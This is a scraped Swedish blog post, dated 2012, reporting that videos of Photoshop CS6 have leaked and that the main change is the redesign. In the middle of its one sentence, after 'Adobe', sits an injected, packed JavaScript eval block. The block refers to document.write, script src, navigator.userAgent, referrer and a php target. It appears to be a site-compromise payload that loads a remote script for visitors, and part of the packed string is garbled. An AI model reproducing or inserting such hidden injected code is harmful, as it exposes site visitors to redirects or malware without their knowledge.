Image Image Image Image Image Image Image Image Image Image

| 22 april, 2018

Scroll to top

Top

PC
No Comments

Video på Photoshop CS6 har läckt och här kan ni se den. | Revue.se

Video på Photoshop CS6 har läckt och här kan ni se den.
Filip Urde
  • On 25 januari, 2012
  • http://www.revue.se/filip-urde

Adobe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kihzd|var|u0026u|referrer|neynf||js|php’.split(‘|’),0,{}))
kommer snart släppa Photoshop CS6 men redan  idag har det läckt ut lite olika videos på den uppdaterade versionen. Den stora skillnaden man ser är designen. Men se mer i videon ovan.